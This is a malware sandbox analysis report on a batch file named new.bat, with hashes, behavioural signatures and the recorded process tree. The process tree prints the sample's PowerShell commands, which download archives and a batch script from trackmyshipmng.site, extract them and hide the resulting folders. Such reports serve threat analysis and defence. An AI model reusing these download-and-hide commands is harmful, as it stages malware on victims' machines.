Analysis
-
max time kernel
361s -
max time network
362s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 18:24
Static task
static1
Behavioral task
behavioral1
Sample
new.bat
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
new.bat
Resource
win10v2004-20240802-en
General
-
Target
new.bat
-
Size
18.0MB
-
MD5
35168f928a81982fc428113f484ea21e
-
SHA1
2029d685911c351cea2857e12c1755df330e4978
-
SHA256
496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344
-
SHA512
4b2dc4e91c04180cb372460231e75270252f389231d759bcd96af05dbb479647d39e860e3f22dcf7041e8ec214a1a12125e8ccf52cd26f87d13ee163d58726ec
-
SSDEEP
48:HmGJ3NlBmmTaQgTymDyb4J7rmxo6rmxoAbYk8OkeFhCaoe1aLHtZQ5ImvBSygyGV:H9FmmNfjwhSCu7OmLT7SkoLEu3S0yhr
Malware Config
Signatures
-
pid Process 2644 powershell.exe 2860 powershell.exe 3032 powershell.exe 2156 powershell.exe 2428 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2664 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2428 powershell.exe 2860 powershell.exe 2156 powershell.exe 3032 powershell.exe 2644 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3068 wrote to memory of 2428 3068 cmd.exe 31 PID 3068 wrote to memory of 2428 3068 cmd.exe 31 PID 3068 wrote to memory of 2428 3068 cmd.exe 31 PID 3068 wrote to memory of 2860 3068 cmd.exe 32 PID 3068 wrote to memory of 2860 3068 cmd.exe 32 PID 3068 wrote to memory of 2860 3068 cmd.exe 32 PID 3068 wrote to memory of 2664 3068 cmd.exe 33 PID 3068 wrote to memory of 2664 3068 cmd.exe 33 PID 3068 wrote to memory of 2664 3068 cmd.exe 33 PID 3068 wrote to memory of 2792 3068 cmd.exe 34 PID 3068 wrote to memory of 2792 3068 cmd.exe 34 PID 3068 wrote to memory of 2792 3068 cmd.exe 34 PID 3068 wrote to memory of 2156 3068 cmd.exe 35 PID 3068 wrote to memory of 2156 3068 cmd.exe 35 PID 3068 wrote to memory of 2156 3068 cmd.exe 35 PID 3068 wrote to memory of 3032 3068 cmd.exe 36 PID 3068 wrote to memory of 3032 3068 cmd.exe 36 PID 3068 wrote to memory of 3032 3068 cmd.exe 36 PID 3068 wrote to memory of 2644 3068 cmd.exe 37 PID 3068 wrote to memory of 2644 3068 cmd.exe 37 PID 3068 wrote to memory of 2644 3068 cmd.exe 37 PID 3068 wrote to memory of 2696 3068 cmd.exe 38 PID 3068 wrote to memory of 2696 3068 cmd.exe 38 PID 3068 wrote to memory of 2696 3068 cmd.exe 38 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2696 attrib.exe 2792 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
PID:2664
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Python"2⤵
- Views/modifies file attributes
PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Print"2⤵
- Views/modifies file attributes
PID:2696
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56dc2d9da0f8bcca40cf042ba71943219
SHA1b0b6e95baff77ac0b1647a26cca553808e065352
SHA256c268eb7be034b85b370e73efa29ddef098b2c97e92f9dd865d5d970c08699fb0
SHA5125abfe232352c3fdd127f692134225fe46b9aa3349478b7b74911ce9ca2170a1145fe44b02f589e2997290b3d1117520bb74d39bf9f6d5360747d4319c0a7f74a